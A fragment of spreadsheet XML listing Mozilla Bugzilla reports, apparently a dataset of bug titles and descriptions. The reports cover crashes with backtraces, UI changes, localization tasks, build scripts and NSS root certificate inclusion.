http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=1&amp;searchby=stacksig&amp;match=contains&amp;searchfor=nsScanner%3A%3AReadUntil&amp;vendor=All&amp;product=All&amp;platform=All&amp;buildid=&amp;sdate=&amp;stime=&amp;edate=&amp;etime=&amp;sortby=bbid</t>
  </si>
  <si>
    <t>CORE-289604</t>
  </si>
  <si>
    <t>Update spidermonkey-n.tests to eliminate obsolete tests</t>
  </si>
  <si>
    <t>I am going to mark bug 119719 as a wontfix which will obsolete
js1_5/Regress/regress-119719.js. 
Also spidermonkey and rhino have diverged on handling default error/exception
lineNumber fileName properties. js1_5/Exceptions/regress-50447.js tests the old
behavior which still exists in rhino but js1_5/Exceptions/regress-50447-1.js
tests the new behavior in spidermonkey. This patch will eliminate
js1_5/Exceptions/regress-50447.js from spidermonkey tests.</t>
  </si>
  <si>
    <t>CORE-825365</t>
  </si>
  <si>
    <t>crash by JS_ASSERT in js::ion::MoveResolver::addMove</t>
  </si>
  <si>
    <t>I'm hitting this in a WebRTC mochitest while bringing up WebRTC on Android.  It triggers a crash everytime I run dom/media/tests/mochitest/ (possibly only with WebRTC enabled on Android I haven't tried without).
If the stacktrace below isn't enough to figure out what's going on it's very easy for me to reproduce and not too hard help someone else reproduce.
Program received signal SIGSEGV Segmentation fault.
Loading libraries and symbols...
[Switching to Thread 12820]
0x5be2d00c in js::ion::MoveResolver::addMove (this=0x5ecfe568 from=... to=... 
    kind=js::ion::MoveResolver::Move::GENERAL)
    at /Users/dmose/r/inbound/src/js/src/ion/MoveResolver.cpp:28
28	    JS_ASSERT(!(from == to))
(gdb) where
#0  0x5be2d00c in js::ion::MoveResolver::addMove (this=0x5ecfe568 from=... to=... 
    kind=js::ion::MoveResolver::Move::GENERAL)
    at /Users/dmose/r/inbound/src/js/src/ion/MoveResolver.cpp:28
#1  0x5be7417c in js::ion::MacroAssemblerARMCompat::passABIArg (this=0x5ecfd1c0 from=...)
    at /Users/dmose/r/inbound/src/js/src/ion/arm/MacroAssembler-arm.cpp:2771
#2  0x5be741e2 in js::ion::MacroAssemblerARMCompat::passABIArg (this=0x5ecfd1c0 reg=...)
    at /Users/dmose/r/inbound/src/js/src/ion/arm/MacroAssembler-arm.cpp:2779
#3  0x5be5db5e in GenerateBailoutThunk (masm=... frameClass=0)
    at /Users/dmose/r/inbound/src/js/src/ion/arm/Trampoline-arm.cpp:406
#4  0x5be5ddb8 in js::ion::IonRuntime::generateBailoutTable (this=0x550a1f60 
    cx=0x51dcfae0 frameClass=0)
    at /Users/dmose/r/inbound/src/js/src/ion/arm/Trampoline-arm.cpp:447
#5  0x5bd914ca in js::ion::IonRuntime::initialize (this=0x550a1f60 cx=0x51dcfae0)
    at /Users/dmose/r/inbound/src/js/src/ion/Ion.cpp:171
#6  0x5ba90a6a in JSRuntime::createIonRuntime (this=0x55613000 cx=0x51dcfae0)
    at /Users/dmose/r/inbound/src/js/src/jscompartment.cpp:180
#7  0x5ba8fb28 in JSRuntime::getIonRuntime (this=0x55613000 cx=0x51dcfae0)
    at /Users/dmose/r/inbound/src/js/src/jscntxt.h:558
#8  0x5ba90af6 in JSCompartment::ensureIonCompartmentExists (this=0x5528c800 cx=0x51dcfae0)
    at /Users/dmose/r/inbound/src/js/src/jscompartment.cpp:202
#9  0x5bd99460 in js::ion::IonCompile (cx=0x51dcfae0 
    script=... fun=... osrPc=0x0 constructing=false compileContext=...)
    at /Users/dmose/r/inbound/src/js/src/ion/Ion.cpp:1162
#10 0x5bd93d8e in js::ion::TestIonCompile (cx=0x51dcfae0 script=... fun=... osrPc=0x0 
    constructing=false) at /Users/dmose/r/inbound/src/js/src/ion/Ion.cpp:1253
#11 0x5bed5284 in js::mjit::stubs::TriggerIonCompile (f=...)
    at /Users/dmose/r/inbound/src/js/src/methodjit/StubCalls.cpp:843
#12 0x5bcf24c6 in JaegerStubVeneer ()
   from /Users/dmose/r/inbound/objdir-droid/dist/bin/libxul.so
#13 0x517e98b0 in ?? ()
#14 0x517e98b0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>SEAMONKEY-193923</t>
  </si>
  <si>
    <t>Find In Page</t>
  </si>
  <si>
    <t>[win32] use system beep on Windows for notification</t>
  </si>
  <si>
    <t>spun off from bug 185905.
find as you type should use the win32 OS beep for notifications. mail
notification and popup blocking does this by default. since win32 offers a
control panel where the user can change the sound the configuration should go
there --rather than adding complexity / bloat to mozilla.</t>
  </si>
  <si>
    <t>FIREFOX-495181</t>
  </si>
  <si>
    <t>OS X: Remove resize mark between location bar and search bar</t>
  </si>
  <si>
    <t>This control is mostly visual noise let's just remove it like we did for the other 3 themes.  Discoverability of the ability to re-size these fields (without mousing over to investigate) isn't worth the cost of a lack of minimalism especially on OS X.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-297502</t>
  </si>
  <si>
    <t>can seamonkey-council@mozilla.org get mail for flag changes?</t>
  </si>
  <si>
    <t>It'd be nice if seamonkey-council@mozilla.org got mail for
blocking-seamonkey1.0a flag changes.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-339485</t>
  </si>
  <si>
    <t>Document Alt+(Up|Down) and F4 shortcuts in search box</t>
  </si>
  <si>
    <t>They trigger the popdown containing installed engines.  I don't know when the shortcuts were implemented but it looks like they were fixed to work in bug 337720 a week and a half ago.
There's a part of me that wants to remove the Ctrl+Up/Down shortcuts from docs since the performed action is significantly less intuitive (the user has to rememeber the order of the installed engines) and replace them with the shortcuts this bug requests.  (There's also a part of me that wants to request Ctrl+Up/Down be *completely* removed but I'm less sure this .)  Thoughts?</t>
  </si>
  <si>
    <t>CORE-77067</t>
  </si>
  <si>
    <t>Inline elements extend outside of containing block elements (w3.org inline overlap)</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.77 [en] (X11 U Linux 2.4.3 i586)
BuildID:    2001042106
Mozilla incorrectly renders text elements inside block elements causing them to
extend partially outside of their containing elements.
Reproducible: Always
Steps to Reproduce:
1. Open http://www.w3.org
2. Examine the banner links (directly beneath the logo) or the items in either
sidebar.
Actual Results:  The top of the banner links extend above the top of their
containing DIV and the bottom of the items in the sidebars are clipped by the
item immediately below.
Expected Results:  Everything renders correctly. :)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-519845</t>
  </si>
  <si>
    <t>Copy needed when no plugins are outdated</t>
  </si>
  <si>
    <t>Currently if a user has some kind of bad plugin (disable vulnerable outdated) then we take the worst one and say
x of y plugins is z
like 
1 of your 14 plugins are vulnerable with no update available
I don't have any copy for when:
1) all plugins are up to date
2) the user has no plugins
I've gone ahead and added 
1) All the plugins listed below are up to date.
please advise with final copy for 1 and 2</t>
  </si>
  <si>
    <t>lmesa</t>
  </si>
  <si>
    <t>THUNDERBIRD-325458</t>
  </si>
  <si>
    <t>Recipient Autocomplete: Nickname does not get highest precedence for matching address book entries for searchphrase==nickname [To CC addressing field/area toplisted priority results]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Thunderbird 1.5
I have an address book entry with the nickname wil.  When I type wil in the To line in the composition window the result is an entry who's last name is Wilbur and which has no nickname at all.
The algorithm for finding addresses in the phone book should have the highest precedence on a full string match of nickname (after all why did the user take the time to enter a nick name after all).  Imho the precedence should be:
1) Full string match on nickname
2) Full string match on last name
3) Full string match on first name
4) Initial string match on nickname
5) Initial string match on last name
6) Initial string match on first name
You may not think this is important but anything that causes mail to get sent to the wrong user inadvertantly is just about he worst possible problem a mailer can have.
Reproducible: Always
Steps to Reproduce:
1. Create an entry with wil as the nickname
2. Create an entry with Wilber as the last name
3. Enter wil in the To: field of the composition window
Actual Results:  
The entry with the last name Wilbur is autocompleted
Expected Results:  
The entry with the nickname wil should have been autocompleted
I entered this defect before and have seen others report it.  However I searched Bugzilla and searching for nickname did not find it.  I apologize if this is duplicate but after about 30min searching I couldn't find the old bug.</t>
  </si>
  <si>
    <t>syshagarwal</t>
  </si>
  <si>
    <t>brian.atkins</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-232828</t>
  </si>
  <si>
    <t>l10n is not possible for the About window</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:0.9.4.1) Gecko/2002 - Netscape 6.2 Mac OS X
The About window text resides in the
[Path_to_Camino.app]/Contents/Resources/Credits.rtf
file.
To allow l10n the file should be put inside a English.lproj folder
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>m.testi</t>
  </si>
  <si>
    <t>CORE-778036</t>
  </si>
  <si>
    <t>Cross-process+omtc layers causing up to 5x excessive recomposites</t>
  </si>
  <si>
    <t>STR
 (1) Flash an otoro with latest everything
 (2) Turn on the FPS monitor
 (3) Fire up the crystalskull webgl demo
The FPS monitor reports 30-40fps but it's obviously running at 5-10fps.
 (4) Force crystalskull back in-process (https://github.com/mozilla-b2g/gaia/blob/master/apps/system/js/window_manager.js#L404)
 (5) Reinstall gaia
 (6) Fire up demo again
The performance is qualitatively the same (because we still have to read back) but this time it reports the more believable 5-10fps.
Something in our cross-process gfx pipeline is forcing us to recomposite *way* too much.
Betting it's sometime to do with http://mxr.mozilla.org/mozilla-central/source/dom/ipc/TabChild.cpp#1134 .</t>
  </si>
  <si>
    <t>matt.woodrow</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-509823</t>
  </si>
  <si>
    <t>Regression watcher/Dashboard not getting data since August 9</t>
  </si>
  <si>
    <t>I've noticed that we've had a surprising lack of regression/win notices lately. And then when I went to check the dashboard to see if that was real or not I noticed that it's not reporting any results newer than August 9th on any tree.
Given that they use the same data gathering script on the same newish host (cruncher) and that regular graph server lookups seem to have more recent data I have elected to conclude that these events are linked.</t>
  </si>
  <si>
    <t>FIREFOX-335961</t>
  </si>
  <si>
    <t>bookmarks export doesn't export keywords</t>
  </si>
  <si>
    <t>The Places bookmarks exporter exports all the bookmarks but without the keywords (right-click - Properties - Keyword).</t>
  </si>
  <si>
    <t>SEAMONKEY-219619</t>
  </si>
  <si>
    <t>addresses in mailing list editor should be LTR even when the UI is RTL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 he-IL rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 he-IL rv:1.4) Gecko/20030624
when using a language pack of a RTL language like hebrew or arabic the UI is
aligned left. when opening the mailing lists editor the addresses in it are
also aligned right although email addresses are in latin charactes. see bug
157607 comment 5 for discussion on the addresses in the message compose window
where there is a similar type of data.
Reproducible: Always
Steps to Reproduce:
1.aligning the interface to the right: add these lines to the file intl.css in
the locale\en-US\global in the en-US.jar file (the language pack file in the
chrome folder):
/*make UI RTL */
windowdialogwizardpage { direction: rtl }
menu { direction: rtl }
outliner { direction: rtl }
/*
 * make sure search from address bar remains in RTL
 */
#urlbar .autocomplete-search-engine
{
direction: rtl !important
}
/*
 * keep Composer  Source tab LTR
 */
#content-source
#doctype-text { direction: ltr }
2. make sure you have a mailing list in the address bar
3. double click a mailing list or select it and click the properties botton.
Actual Results:  
all addresses are aligned right
Expected Results:  
addresses should be aligned left
like in bug 157607 the css class uri-element should be added to the proper xul
file to fix this.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-226287</t>
  </si>
  <si>
    <t>Camino's default homepage points to an outdated old page.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6b) Gecko/20031115 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6b) Gecko/20031115 Camino/0.7+
The default launch homepage for Camino is
http://www.mozilla.org/projects/camino/homepage.html
This page is outdated. Instead Camino should go to
http://www.mozilla.org/projects/camino/ which seems to be the current active
homepage.
The file that needs to be edited is WebsiteDefaults.strings.
Reproducible: Always
Steps to Reproduce:
1. Launch Camino with a fresh profile or with no existing preferences
2.
3.
Actual Results:  
Goes to http://www.mozilla.org/projects/camino/homepage.html
Expected Results:  
Should have gone to http://www.mozilla.org/projects/camino/ instead</t>
  </si>
  <si>
    <t>SEAMONKEY-132119</t>
  </si>
  <si>
    <t>[mach] Mach-o builds crash on startup</t>
  </si>
  <si>
    <t>Using a mach-o build (opt) from this morning (the same one on ftp.m.o) I 
get a crash on startup. This looks like the same problem that the aol 
person was having. Setting to blocker as this is a blocker for me. I can 
post CrashReporter data but I doubt it will do any good since it is an opt 
build let me know if you want it.</t>
  </si>
  <si>
    <t>CORE-344557</t>
  </si>
  <si>
    <t>[columns] Crash [@ nsLineBox::DeleteLineList] with moz-column-count and generated content</t>
  </si>
  <si>
    <t>See upcoming testcase which crashes current trunk build and Firefox1.5.05.
Talkback ID: TB20910283Z
0x0000012c
nsLineBox::DeleteLineList   nsBlockFrame::DoRemoveFrame   nsBlockFrame::RemoveFrame   nsFrameManager::RemoveFrame   nsCachedStyleData::Destroy  
I'm afraid it window size dependant so the testcase contains a window.resizeTo(1440 600) function your browser should allow the resize.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-450021</t>
  </si>
  <si>
    <t>Sync window shows incorrect current status</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a2pre) Gecko/2008080700 SeaMonkey/2.0a1pre
Build Identifier: 0.2.26
Status showed in pop-up sync status window not every time is correct.
At least today I lost my internet connection during manual initiated sync and see:
sync window stall on encrypting data last 2 record in log file was 
PUT request for user-data/history/deltas/27
Reproducible: Always
Actual Results:  
Statuses in pop-up status window should be more accurate.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-579061</t>
  </si>
  <si>
    <t>[sv-SE] Localize Firefox 4 beta firstrun page and its associated video</t>
  </si>
  <si>
    <t>You have now a /4beta/ folder in your SVN repository (svn update).
Reminder mozilla.com repo for your locale is:
https://svn.mozilla.org/projects/mozilla.com/trunk/YOURLOCALECODE/
The firstrun page is split in 3 tasks:
- translation of the page itself : 
/firefox/4beta/firstrun/index.html
- adding and translating 4 new strings in your main.lang file these strings are for the video player on this page and will be used in other pages on the
site (see the webdashboard for your locale)
- translation of the subtitles for the video located in
/includes/l10n/sub-fx4-firstrun-beta.html
The subtitles are a simple html file each subtitle is enclosed in a .
Please commit directly to SVN and indicate your revision numbers here or alternatively attach your files to this bug (upload them with the text/plain MIME type).
The staging site for the page is:
https://www-trunk.stage.mozilla.com/uk/firefox/4.0b1/firstrun/
This page will be common for all betas so /4.0b1//4.0b2/... will actually point to /4beta/
If you have any question don't hesitate to ping me on irc (pascalc) or to put a message in your bug.
Thanks</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-380260</t>
  </si>
  <si>
    <t>AllPeers 0.56.3 stubs need swapping out</t>
  </si>
  <si>
    <t>We have another maintenance release:
http://www.allpeers.com/download/amo/0.56.3/allpeers_beta-0.56.3-fx-linux.xpi
http://www.allpeers.com/download/amo/0.56.3/allpeers_beta-0.56.3-fx-macosx.xpi
http://www.allpeers.com/download/amo/0.56.3/allpeers_beta-0.56.3-fx-windows.xpi
Extension ID: allpeers@allpeers.com
AMO page: https://addons.mozilla.org/en-US/firefox/addon/3234
Thanks as always for your assistance!</t>
  </si>
  <si>
    <t>FIREFOX-258318</t>
  </si>
  <si>
    <t>searchbar grabbing cursor broken / search bar editable during toolbar customization</t>
  </si>
  <si>
    <t>I overlooked that.
The rule that no more apply (from autocomplete.css) is this one:
toolbarpaletteitem &gt; toolbaritem &gt; textbox &gt; hbox &gt; hbox &gt; html|*.textbox-input {
  visibility: hidden
}
we could...
1) replace it with:
toolbarpaletteitem &gt; toolbaritem textbox &gt; hbox &gt; hbox &gt; html|*.textbox-input {
  visibility: hidden
}
using the descendent selector.
2) or add the rule:
toolbarpaletteitem &gt; toolbaritem &gt; * &gt; textbox &gt; hbox &gt; hbox &gt;
html|*.textbox-input {
  visibility: hidden
}
3) or put a searchbar specific rule in searchbar.css
Althought (1) is tempting I would prefer (2) because the descendent selector is
really expensive and because it could still benefit extension makers unlike (3).</t>
  </si>
  <si>
    <t>TESTOPIA-456474</t>
  </si>
  <si>
    <t>TestRun.add_cases of 100 cases at a time to a run sets index values</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1.10) Gecko/20071128 Fedora/2.0.0.10-2.fc7 Firefox/2.0.0.10
Build Identifier: Testopia 2.1
I'm adding cases to a Run by calling TestRun.add_cases with an array of 100 case_ids and one run_id (with java and apache xmlrpc 3).  
    public STAFResult AddCasesToRun (int run_id Vector case_ids)
	{
    	Vector params = new Vector()
     	params.add(case_ids)
     	params.add(run_id)
     	String error_string = new String()
		Vector&gt; xmlrpc_result = new Vector&gt;()
    	try 
    	{
    		Object resObj
    		resObj = Execute(TestRun.add_cases params)
oddly I find the index columns set with the first case having index 1 but the next 22 cases having index 2.  the next three cases are 4 5 and 6 respectively but then a spate of 23 7's.  this pattern of mostly repeated indexes continues and in fact seems pretty consistent insofar as I got a similar pattern (a single 1 a bunch of 2's 4 5 6 bunch of 7's) the second time I tried this.  
Reproducible: Always
Steps to Reproduce:
adding about 1200 cases to a test run 100 at a time using TestRun.add_cases.
Actual Results:  
index field being populated in a non-useful manner
Expected Results:  
according to gregary index shouldn't be getting populated when tests added through this api.</t>
  </si>
  <si>
    <t>nparrish</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-495678</t>
  </si>
  <si>
    <t>remove unused strings Open Actions list and Open panel of stuff from shortcuts.properties</t>
  </si>
  <si>
    <t>In locales/en-US/chrome/shortcuts.properties we have the following entities:
cmd_actions.name=Open Actions list
cmd_panel.name=Open panel of stuff
These strings do not correspond to any Fennec UI and therefore should be removed... 
If not please supply a localization note about what this Panel of Stuff is so we can make a proper localization</t>
  </si>
  <si>
    <t>CORE-373231</t>
  </si>
  <si>
    <t>implement navigator.isLocallyAvailable</t>
  </si>
  <si>
    <t>Created attachment 257860
First cut at implementing isLocallyAvailable. 
Implement navigator.isLocallyAvailable as described at http://www.campd.org/stuff/Offline%20Cache.html</t>
  </si>
  <si>
    <t>BUGZILLA-351983</t>
  </si>
  <si>
    <t>Move admin creation out of checksetup.pl and into Bugzilla::Install</t>
  </si>
  <si>
    <t>This is another phase of checksetup.pl cleanup. We're going to move the code that creates the initial admin out of checksetup and into Bugzilla::Install.</t>
  </si>
  <si>
    <t>THUNDERBIRD-310202</t>
  </si>
  <si>
    <t>forwarding as attachment produces wrong message body for forwarded message</t>
  </si>
  <si>
    <t>this is with thunderbird 1.0.6 on windows xp connecting over IMAP
1. send myself a message with body A
2. then forward it to myself making the body of the new message B
3. the final email i get has B as the body for both the new message and the
attached forwarded message (though in the attachment table of contents it says
it has attached A)
this is only happening with the sending forwarded emails as attachments option
on (inline works fine). i've tried toggleing that pref back and forth to no avail.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-234954</t>
  </si>
  <si>
    <t>remove nsIDeviceContext::ConvertPixel</t>
  </si>
  <si>
    <t>Unused method - goodbye.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-143888</t>
  </si>
  <si>
    <t>Release Note (1.0 ~ 1.3a) should emphasize the need to make a symlink to java</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
Could you please emphasize (e.g. at
http://www.mozilla.org/releases/mozilla1.0/#java) that
$MOZILLA_FIVE_HOME/plugins/libjavaplugin_oji140.so (e.g.) *does have* to be a
symlink to the real j2re .so file for the java to work properly? This is already
mentioned on 
http://www.mozilla.org/releases/mozilla1.0/#java but it isn't said that it
won't work if one copy the file instead of making the symlink. If it's copied
it crashes mozilla and gives some not very helpful error messages.
Thanks in advance I spend half a day trying to get things working.
Reproducible: Always
Steps to Reproduce:
1.copy the mentioned .so file to $MOZILLA_FIVE_HOME/plugins
2.open a page with java applet
3.it crashes immediately</t>
  </si>
  <si>
    <t>apur</t>
  </si>
  <si>
    <t>CORE-240201</t>
  </si>
  <si>
    <t>remove [noscript] from nsICookieManager2::add</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/124 (KHTML like Gecko) Safari/125.1
Build Identifier: 
I've built a Mozilla/Firefox extension that allows a web developer to edit cookies.  The only problem is 
that while nsICookieManager provides an interface to remove and read cookies it does not provide a 
corresponding method to add a cookie.  nsICookieManager2 has a perfectly appropriate method but it 
is marked [noscript].  If this were removed my extension would work.  I cannot find any other way to 
do this - nsICookieService's API is not similar and doesn't allow the same direct access to the cookie 
database.
I don't know of any reason for this method to be [noscript].  Is there any?
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>laotzu</t>
  </si>
  <si>
    <t>THUNDERBIRD-521384</t>
  </si>
  <si>
    <t>Cannot set font size to 8 from Options--&gt;tab Display (but Advanced window work)</t>
  </si>
  <si>
    <t>STR:
1. menu--&gt;tools--&gt;options... tab Display buttonf Advanced
2. set font as in attached screenshot (I think that the font name is irrilevant)
3. close Advanced window and return to Options window: I cannot set font size to 8 and font size not is show
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.5pre) Gecko/20091008 Lightning/1.0pre Shredder/3.0pre ID:20091008033625</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-509264</t>
  </si>
  <si>
    <t>Sisyphus - uninstall broken</t>
  </si>
  <si>
    <t>Created attachment 393396
patch
uninstall-build.sh incorrectly checks for a current installation at the specificed location. The fix is to change:
-if [[ ! ls $executablepath/* 2&gt; /dev/null ]] then
+if ! ls $executablepath/* &gt; /dev/null 2&gt; then
This uncovers an existing problem with Windows zip builds where calling the Windows uninstaller will fail for zip builds. Suppressing uninstaller failures on Windows allows the target directory to be cleaned up and the uninstall to succeed.</t>
  </si>
  <si>
    <t>NSS-392846</t>
  </si>
  <si>
    <t>Do not send hello extensions when using SSL v3.0</t>
  </si>
  <si>
    <t>In order to fix an issue with Thunderbird and the matrixssl library it has been proposed to never send hello extensions when using SSL v3.0
See bug 368611 and the discussions around the report from Filippo.</t>
  </si>
  <si>
    <t>CORE-145577</t>
  </si>
  <si>
    <t>scrollHeight/scrollTop not supported correctly on textareas</t>
  </si>
  <si>
    <t>The scroll model inside html textareas is broken. The return value for
scrollHeight returns incorrectly always the same value as the height of the
textarea.
This is a severe loss of functionality because teh ability to control the size
and scrolling of textareas is maybe even more important than for other elements.
I know that the scroll model is very buggy in general but it is totally broken
for textareas. This is not acceptable.</t>
  </si>
  <si>
    <t>CORE-431175</t>
  </si>
  <si>
    <t>Thunderbird crashes @nsDocument::GetScriptGlobalObject() on closing if drop down menu still visible</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008042806 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008042803 Thunderbird/3.0a1pre ID:2008042803
On closing Thunderbird using top-right X Thunderbird crashes if a drop-down menu on the toolbar is still visible.
Reproducible: Always
Steps to Reproduce:
1. Open drop-down menu (e.g. Tools) but do not choose from it.
2. Hit top-right X to close Thunderbird.
3.
I know this is an unusual transaction as normally you wouldn't close the app while a menu is visible. Indeed it happened first by accident.</t>
  </si>
  <si>
    <t>williejreid</t>
  </si>
  <si>
    <t>BUGZILLA-250547</t>
  </si>
  <si>
    <t>FlagTypes uses DB dependent comma operator</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040528 Debian/1.6-7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040528 Debian/1.6-7
As reported and fixed in bug 228917 comma operator can be DB specific. In
Bugzilla/FlagTypes.pm there is another occurence which should be replaced by
INNER JOIN. Patch follows.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-375270</t>
  </si>
  <si>
    <t>GC: separating traversal and marking</t>
  </si>
  <si>
    <t>[This is a spin-off of bug 372960 comment 21]
The current code in SpiderMonkey that implements the marking phase of GC effectively consists of 2 independent parts:
1. The traversal of GC-related children of GC-controllable things like gcthings atoms and JSScopeProperty instances.
2. The marking of GC-related things.
If we can separate the traversal from marking making GC just a one of the user of the marking code it would allow to reuse the traversal code in the XPCOM cycle collector (see bug 372960 for the example of code duplication).
Another advantage would be the ability to print a graph of live GC-related things without running GC.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-525157</t>
  </si>
  <si>
    <t>Increase size of /builds on staging-stage.b.m.o</t>
  </si>
  <si>
    <t>It's currently at 50 GB which is woefully small for the amount of stuff we're generating today.
Can we bump it up to 200 GB?</t>
  </si>
  <si>
    <t>TOOLKIT-310715</t>
  </si>
  <si>
    <t>Software update fails going from 2005093006 to 2005100107 nightly build</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051001 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051001 Firefox/1.4.1
There is a bug is Software Update that make it fail when attempting to update
from the 2005093006 to 2005100107 nightly build
Reproducible: Always
Steps to Reproduce:
1. If you currently have Firefox installed uninstall it and install the
2005093006 nightly build
2. Launch Firefox and install Nightly Tester Tools:
http://users.blueprintit.co.uk/~dave/web/firefox/buildid/nightly.html
3. Restart Firefox then click Help --&gt; Check for Updates... . You will get A
new version of Firefox is available:  Firefox 1.4 ...
4. Click Download and Install Now.  A 509 KB file will be downloaded and you
will receive the message The update was successfully downloaded and verified.
 you must restart Firefox so that the update can be installed.  Your current
build number should be indicated as Build 2005093006 in the Firefox title bar
5. Click Restart Firefox Now
6. After Firefox loads you should notice that the build number is still
20053006 and you now have a Softare Update Update Failed dialog with the
message The partial Update could not be applied.  Firefox will try again by
downloading the complete Update.
7. Click Next for the complete update.
8. Click Restart Firefox Now once the complete update has been downloaded
9. Once Firefox is up and running again you will notice that your build number
is still 2005093006
10. Click Help --&gt; Check for Updates... . You will once again get A new version
of Firefox is available:  Firefox 1.4  This is the exact same build as before.
11. If you continue with the update process you can pretty much repeat steps 3
to 9 over and over. or...
12. Manually download and install the 2005100107 nightly build.
13. Only now should you notice that the build number has changed to 2005100107.
Actual Results:  
Software update fails to successfully perform either a partial update or
complete install.
Expected Results:  
Software update should have been able to successfully perform either a partial
update or complete install.</t>
  </si>
  <si>
    <t>fehe</t>
  </si>
  <si>
    <t>NSS-424152</t>
  </si>
  <si>
    <t>Add thawte Primary Root CA to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following
root CA certificate owned by thawte:
1) Friendly name: thawte Primary Root CA
   SHA-1 fingerprint:
91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81
   Trust flags: Web sites
   URL:
https://bugzilla.mozilla.org/attachment.cgi?id=306736
The thawte Primary Root CA has been assessed in accordance with the Mozilla project guidelines and the certificate approved for inclusion per bug 407163.
The remaining steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is correct and that the correct certificate(s) have been attached. They must also specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new certificate(s) and attaches nssckbi.dll to this bug. A representative of the CA must download this drop it into a copy of Firefox and/or Thunderbird on the OS in question and confirm (by adding a comment here) that the certificate(s) have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a version of NSS which contains the certificate(s). This process is mostly under the control of the release drivers for those products.</t>
  </si>
  <si>
    <t>THUNDERBIRD-352406</t>
  </si>
  <si>
    <t>Dead code in nsMsgDBView</t>
  </si>
  <si>
    <t>Now that we use tags instead of labels nsMsgDBView no longer needs to be an observer. It was observing the old style pref label:
http://lxr.mozilla.org/mozilla/source/mailnews/base/src/nsMsgDBView.cpp#279</t>
  </si>
  <si>
    <t>WEBSITES-527153</t>
  </si>
  <si>
    <t>add output option to nightly scraper script</t>
  </si>
  <si>
    <t>this will make it easier for IT to deploy updates</t>
  </si>
  <si>
    <t>JSS-129394</t>
  </si>
  <si>
    <t>change Assert.assert to Assert._assert</t>
  </si>
  <si>
    <t>In JDK 1.4 assert is a keyword so our method Assert.assert needs to change.
Let's start now by deprecating it and pushing its replacement _assert. Change
all JSS code to call the new method.</t>
  </si>
  <si>
    <t>CORE-487413</t>
  </si>
  <si>
    <t>Delete unnecessary fast natives in js shell</t>
  </si>
  <si>
    <t>I deleted them yesterday but then I had to revert that change.  They really should be killed though.</t>
  </si>
  <si>
    <t>BUGZILLA-274509</t>
  </si>
  <si>
    <t>Document Create chart datasets for this product</t>
  </si>
  <si>
    <t>We need to document this option and perhaps add a little explanatory text on
the page.
Gerv</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-107901</t>
  </si>
  <si>
    <t>panodi.com - GoLive Menu does not appear</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.5+) Gecko/20011027
BuildID:    2001102706
Works with IE. Mouse over where it says horoscopo and a menu should appear
but it does not work with the lizard
Reproducible: Always
Steps to Reproduce:
1.Go to url and mouse over the links
Actual Results:  No menu is displayed
Expected Results:  Menu with more links should appear</t>
  </si>
  <si>
